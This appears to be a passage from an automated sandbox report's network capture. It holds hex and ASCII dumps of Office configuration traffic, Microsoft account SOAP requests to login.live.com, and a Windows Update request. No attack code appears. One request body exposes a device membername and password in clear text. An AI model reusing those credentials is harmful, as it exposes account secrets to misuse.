                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC12336INData Raw: 6a 36 72 6f 4a 31 55 30 70 34 72 69 71 6d 68 65 46 53 32 6f 6f 67 64 63 70 41 6b 69 6d 36 5a 38 31 61 41 70 58 33 57 70 6f 70 4f 71 36 4a 51 71 69 71 71 69 4a 62 4f 79 34 68 36 4c 38 74 55 4f 6d 2f 4a 56 70 79 71 36 6f 59 71 2b 56 55 58 66 71 61 4c 76 56 56 46 63 46 53 32 70 6f 6d 56 56 39 46 79 53 49 6a 70 6a 56 77 4f 79 73 4a 52 37 4a 69 74 6a 6c 33 74 38 57 6b 4b 34 2f 62 6c 56 59 77 2b 33 73 32 48 6d 6e 79 54 67 2f 4c 55 54 6e 69 64 31 6c 34 41 58 6b 77 47 30 33 65 6c 6c 71 4f 59 7a 73 79 38 4b 5a 6a 75 53 41 49 79 56 2b 67 56 6f 59 77 42 4f 38 6a 55 74 68 6d 73 47 6b 75 70 64 4f 70 7a 53 41 42 77 75 36 42 4d 63 65 67 44 4e 75 71 50 50 6d 33 52 34 43 44 6f 30 75 65 6b 58 4e 46 4f 67 5a 6a 6a 55 69 6a 75 55 56 74 55 69 6d 50 30 50 6d 68 33 68 44 70 6b
                                                                                                                                                                                                                                                                Data Ascii: j6roJ1U0p4riqmheFS2oogdcpAkim6Z81aApX3WpopOq6JQqiqqiJbOy4h6L8tUOm/JVpyq6oYq+VUXfqaLvVVFcFS2pomVV9FySIjpjVwOysJR7Jitjl3t8WkK4/blVYw+3s2HmnyTg/LUTnid1l4AXkwG03ellqOYzsy8KZjuSAIyV+gVoYwBO8jUthmsGkupdOpzSABwu6BMcegDNuqPPm3R4CDo0uekXNFOgZjjUijuUVtUimP0Pmh3hDpk
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC16384INData Raw: 41 43 73 4b 41 52 41 47 41 51 6f 51 41 67 45 53 62 30 38 41 64 67 42 6c 41 48 49 41 59 51 42 73 41 47 77 41 4c 41 41 67 41 47 67 41 62 77 42 33 41 43 41 41 63 77 42 68 41 48 51 41 61 51 42 7a 41 47 59 41 61 51 42 6c 41 47 51 41 49 41 42 33 41 47 55 41 63 67 42 6c 41 43 41 41 65 51 42 76 41 48 55 41 49 41 42 33 41 47 6b 41 64 41 42 6f 41 43 41 41 65 51 42 76 41 48 55 41 63 67 41 67 41 47 55 41 65 41 42 77 41 47 55 41 63 67 42 70 41 47 55 41 62 67 42 6a 41 47 55 41 49 41 42 31 41 48 4d 41 61 51 42 75 41 47 63 41 49 41 42 30 41 47 67 41 5a 51 41 67 41 47 34 41 5a 51 42 33 41 43 41 41 54 77 42 6d 41 47 59 41 61 51 42 6a 41 47 55 41 49 41 42 55 41 47 67 41 5a 51 42 74 41 47 55 41 49 41 42 6a 41 47 38 41 62 41 42 76 41 48 49 41 63 77 41 73 41 43 41 41 63 77 42
                                                                                                                                                                                                                                                                Data Ascii: ACsKARAGAQoQAgESb08AdgBlAHIAYQBsAGwALAAgAGgAbwB3ACAAcwBhAHQAaQBzAGYAaQBlAGQAIAB3AGUAcgBlACAAeQBvAHUAIAB3AGkAdABoACAAeQBvAHUAcgAgAGUAeABwAGUAcgBpAGUAbgBjAGUAIAB1AHMAaQBuAGcAIAB0AGgAZQAgAG4AZQB3ACAATwBmAGYAaQBjAGUAIABUAGgAZQBtAGUAIABjAG8AbABvAHIAcwAsACAAcwB
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC16384INData Raw: 65 6c 65 6d 65 74 72 79 22 3a 66 61 6c 73 65 2c 22 43 68 61 6e 67 65 47 61 74 65 2e 53 68 61 72 65 64 52 69 63 68 41 70 69 43 6c 65 61 6e 75 70 22 3a 66 61 6c 73 65 2c 22 55 73 65 43 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 61 73 54 61 73 6b 50 61 6e 65 22 3a 66 61 6c 73 65 2c 22 43 47 55 73 65 45 78 63 65 6c 55 64 66 48 6f 73 74 42 75 6e 64 6c 65 32 22 3a 66 61 6c 73 65 2c 22 43 68 61 6e 67 65 47 61 74 65 2e 53 65 74 54 65 61 6d 73 41 64 64 69 6e 4c 61 73 74 55 73 65 64 22 3a 66 61 6c 73 65 2c 22 43 68 61 6e 67 65 47 61 74 65 2e 53 68 61 72 65 64 52 75 6e 74 69 6d 65 46 6f 72 46 69 72 73 74 50 61 72 74 79 53 64 78 22 3a 66 61 6c 73 65 7d 2c 22 4f 66 66 69 63 65 5f 4f 66 66 69 63 65 49 6e 73 69 64 65 72 22 3a 7b 22 55 70 64 61 74 65 4e 6f 77 22 3a 74 72 75 65
                                                                                                                                                                                                                                                                Data Ascii: elemetry":false,"ChangeGate.SharedRichApiCleanup":false,"UseComponentTypeasTaskPane":false,"CGUseExcelUdfHostBundle2":false,"ChangeGate.SetTeamsAddinLastUsed":false,"ChangeGate.SharedRuntimeForFirstPartySdx":false},"Office_OfficeInsider":{"UpdateNow":true
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC16384INData Raw: 69 6c 65 22 3a 66 61 6c 73 65 2c 22 53 70 65 6c 6c 65 72 2e 4c 69 64 30 2e 4f 70 74 69 6f 6e 73 4f 76 65 72 72 69 64 65 22 3a 22 55 73 65 52 65 73 74 72 69 63 74 65 64 4e 61 6d 65 64 45 6e 74 69 74 79 42 6c 6f 6f 6d 46 69 6c 74 65 72 3d 31 22 2c 22 53 70 65 6c 6c 65 72 2e 4c 69 64 39 2e 4f 70 74 69 6f 6e 73 4f 76 65 72 72 69 64 65 22 3a 22 55 73 65 52 65 73 74 72 69 63 74 65 64 4e 61 6d 65 64 45 6e 74 69 74 79 42 6c 6f 6f 6d 46 69 6c 74 65 72 3d 31 22 2c 22 4c 61 73 74 4d 69 6c 65 54 65 6c 65 6d 65 74 72 79 2e 46 65 61 74 75 72 65 46 6c 69 67 68 74 22 3a 37 2c 22 4c 61 73 74 4d 69 6c 65 54 65 6c 65 6d 65 74 72 79 2e 46 65 61 74 75 72 65 46 6c 69 67 68 74 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 4c 61 73 74 4d 69 6c 65 46 61 63 61 64 65 2e 46 65 61
                                                                                                                                                                                                                                                                Data Ascii: ile":false,"Speller.Lid0.OptionsOverride":"UseRestrictedNamedEntityBloomFilter=1","Speller.Lid9.OptionsOverride":"UseRestrictedNamedEntityBloomFilter=1","LastMileTelemetry.FeatureFlight":7,"LastMileTelemetry.FeatureFlightEnabled":false,"LastMileFacade.Fea
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC16384INData Raw: 3a 32 7d 2c 22 47 65 74 4e 65 74 77 6f 72 6b 43 6f 73 74 53 65 72 76 69 63 65 55 6e 61 76 61 69 6c 61 62 6c 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 7d 7d 7d 2c 22 45 76 65 6e 74 73 22 3a 7b 22 50 61 63 6b 61 67 65 41 70 70 78 45 78 74 72 61 63 74 6f 72 54 61 73 6b 50 61 63 6b 61 67 65 49 6e 66 6f 72 6d 61 74 69 6f 6e 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 7d 7d 2c 22 41 63 74 69 76 61 74 69 6f 6e 22 3a 7b 22 45 76 65 6e 74 73 22 3a 7b 22 43 72 65 61 74 65 53 6f 6c 75 74 69 6f 6e 52 65 66 49 6e 74 65 72 6e 61 6c 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 43 52 65 6d 6f 74 65 72 50 72 6f 78 79 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 7d 7d 2c 22 4f 66 66 69 63 65 4a 73 22 3a 7b 22 45 76 65 6e 74 73 22
                                                                                                                                                                                                                                                                Data Ascii: :2},"GetNetworkCostServiceUnavailable":{"EventFlag":2}}}},"Events":{"PackageAppxExtractorTaskPackageInformation":{"EventFlag":2}}},"Activation":{"Events":{"CreateSolutionRefInternal":{"EventFlag":2},"CRemoterProxy":{"EventFlag":256}}},"OfficeJs":{"Events"
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC16384INData Raw: 51 75 65 75 65 4c 6f 61 64 41 73 79 6e 63 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 54 72 61 6e 73 6d 69 74 51 75 65 75 65 49 6e 69 74 46 69 6c 65 50 61 74 68 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 54 72 61 6e 73 6d 69 74 51 75 65 75 65 43 72 65 61 74 65 49 6e 73 61 6e 63 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 54 72 61 6e 73 6d 69 74 51 75 65 75 65 41 70 70 65 6e 64 41 73 79 6e 63 42 61 74 63 68 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 54 72 61 6e 73 6d 69 74 51 75 65 75 65 57 72 69 74 65 41 63 74 69 76 69 74 79 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 54 72 61 6e 73 6d 69 74 51 75 65 75 65 52 65 6d 6f 76 65 41 73 79 6e 63 42 61 74 63 68 22
                                                                                                                                                                                                                                                                Data Ascii: QueueLoadAsync":{"EventFlag":512},"TransmitQueueInitFilePath":{"EventFlag":512},"TransmitQueueCreateInsance":{"EventFlag":512},"TransmitQueueAppendAsyncBatch":{"EventFlag":512},"TransmitQueueWriteActivity":{"EventFlag":512},"TransmitQueueRemoveAsyncBatch"
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC16384INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 6f 73 65 64 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 2c 22 4f 6e 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 6f 73 65 64 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 7d 7d 7d 7d 2c 22 4d 4c 22 3a 7b 22 53 75 62 4e 61 6d 65 73 70 61 63 65 73 22 3a 7b 22 4d 6f 64 65 6c 44 6f 77 6e 6c 6f 61 64 22 3a 7b 22 45 76 65 6e 74 73 22 3a 7b 22 44 6f 77 6e 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 46 72 6f 6d 43 61 74 61 6c 6f 67 41 73 79 6e 63 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 7d 7d 7d 7d 2c 22 54 61 72 67 65 74 65 64 4d 65 73 73 61 67 69 6e 67 22 3a 7b 22 45 76 65 6e 74 73 22 3a 7b 22 42 75 73 62 61 72 54 68 65 6d 65 53 65 6c 65 63 74 69 6f 6e 53 74 61 74 75 73 22 3a 7b 22 45 76 65 6e 74 46 6c 61
                                                                                                                                                                                                                                                                Data Ascii: ConnectionClosed":{"EventFlag":256},"OnConnectionClosed":{"EventFlag":256}}}}},"ML":{"SubNamespaces":{"ModelDownload":{"Events":{"DownloadResourcesFromCatalogAsync":{"EventFlag":2}}}}},"TargetedMessaging":{"Events":{"BusbarThemeSelectionStatus":{"EventFla
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC16384INData Raw: 6e 64 44 69 73 70 6c 61 79 2e 52 65 41 72 72 61 6e 67 65 53 65 70 74 65 6d 62 65 72 32 30 32 32 22 3a 66 61 6c 73 65 2c 22 4c 61 79 6f 75 74 41 6e 64 44 69 73 70 6c 61 79 2e 56 69 63 74 6f 72 46 75 72 6e 69 74 75 72 65 41 70 72 69 6c 32 30 32 32 22 3a 66 61 6c 73 65 2c 22 53 65 74 53 65 73 73 69 6f 6e 49 64 65 6e 74 69 74 79 52 65 73 6f 6c 76 65 72 32 22 3a 66 61 6c 73 65 2c 22 4c 61 79 6f 75 74 41 6e 64 44 69 73 70 6c 61 79 2e 52 65 41 72 72 61 6e 67 65 4a 75 6e 65 32 30 32 32 22 3a 66 61 6c 73 65 2c 22 4c 61 79 6f 75 74 41 6e 64 44 69 73 70 6c 61 79 2e 52 65 70 61 67 54 6f 43 70 49 6e 43 70 47 6f 74 6f 50 67 63 62 22 3a 66 61 6c 73 65 2c 22 56 65 72 69 66 79 46 6f 6f 74 6e 6f 74 65 4f 72 45 6e 64 6e 6f 74 65 49 6e 44 6f 64 47 65 74 46 6f 6f 74 45 6e 64
                                                                                                                                                                                                                                                                Data Ascii: ndDisplay.ReArrangeSeptember2022":false,"LayoutAndDisplay.VictorFurnitureApril2022":false,"SetSessionIdentityResolver2":false,"LayoutAndDisplay.ReArrangeJune2022":false,"LayoutAndDisplay.RepagToCpInCpGotoPgcb":false,"VerifyFootnoteOrEndnoteInDodGetFootEnd
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC694INData Raw: 32 39 35 30 36 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 35 30 35 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 34 34 34 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 34 33 30 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 34 32 38 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 34 32 36 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 34 31 36 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 34 31 34 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 33 37 31 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 33 33 38 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 32 39 33 2d 32 2d 33 2c 50 2d 44 2d 31 30 32 39 32 38 39 2d 31 36 2d 34 2c 50 2d 44 2d 31 30 32 39 32 37 36 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 32 37 35 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 32 37 32 2d 31 2d 33 2c 50 2d 44 2d 31 30 32 39 32 37 30 2d 31 2d 33 2c 50 2d 44 2d
                                                                                                                                                                                                                                                                Data Ascii: 29506-1-3,P-D-1029505-1-3,P-D-1029444-1-3,P-D-1029430-1-3,P-D-1029428-1-3,P-D-1029426-1-3,P-D-1029416-1-3,P-D-1029414-1-3,P-D-1029371-1-3,P-D-1029338-1-3,P-D-1029293-2-3,P-D-1029289-16-4,P-D-1029276-1-3,P-D-1029275-1-3,P-D-1029272-1-3,P-D-1029270-1-3,P-D-


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                1192.168.2.44974020.190.159.73443
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:22:44 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                Content-Length: 3592
                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                2024-08-12 13:22:44 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                2024-08-12 13:22:44 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                Expires: Mon, 12 Aug 2024 13:21:44 GMT
                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                x-ms-route-info: C533_BAY
                                                                                                                                                                                                                                                                x-ms-request-id: 5676fe8d-92fc-4b4a-b8ee-b26332d55caa
                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF00011E02 V: 0
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:22:44 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 1276
                                                                                                                                                                                                                                                                2024-08-12 13:22:44 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                2192.168.2.44974420.190.159.73443
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:22:45 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                Content-Length: 7642
                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                2024-08-12 13:22:45 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 6e 6e 6d 70 61 62 6e 71 61 63 70 75 6c 76 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 31 7a 31 4a 45 71 67 75 71 6d 43 74 43 25 32 70 71 7a 56 79 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 61 6b 71 72 6c 66 67 75 6b 69 6a 65 76 6c 3c 2f 4f 6c 64 4d
                                                                                                                                                                                                                                                                Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02nnmpabnqacpulv</Membername><Password>1z1JEqguqmCtC%2pqzVy</Password></Authentication><OldMembername>02akqrlfgukijevl</OldM
                                                                                                                                                                                                                                                                2024-08-12 13:22:47 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                Expires: Mon, 12 Aug 2024 13:21:45 GMT
                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                x-ms-route-info: C528_SN1
                                                                                                                                                                                                                                                                x-ms-request-id: c4c0d55c-7933-45c8-bd1b-5a27f305a64b
                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F072 V: 0
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:22:47 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 17166
                                                                                                                                                                                                                                                                2024-08-12 13:22:47 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 34 30 30 46 35 33 36 43 42 43 43 32 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 39 30 63 32 64 32 39 37 2d 65 31 31 64 2d 34 36 31 35 2d 61 35 30 37 2d 37 36 33 32 34 30 34 65 65 63 31 39 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                                                                                                                                Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018400F536CBCC2</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="90c2d297-e11d-4615-a507-7632404eec19" LicenseID="3252b20c-d425-4711
                                                                                                                                                                                                                                                                2024-08-12 13:22:47 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                                                                                                                                                Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                3192.168.2.44974740.68.123.157443
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:22:47 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kl2U8yuCv7Zo65W&MD=b5mTn25W HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                2024-08-12 13:22:48 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                MS-CorrelationId: b52d4671-d21d-4993-aa5d-e5f34f8a134b
                                                                                                                                                                                                                                                                MS-RequestId: 9fb7d40f-7cda-4ba0-9265-5d06500fbaac
                                                                                                                                                                                                                                                                MS-CV: aZs42yt6dUmzpMiR.0
                                                                                                                                                                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:22:47 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 24490
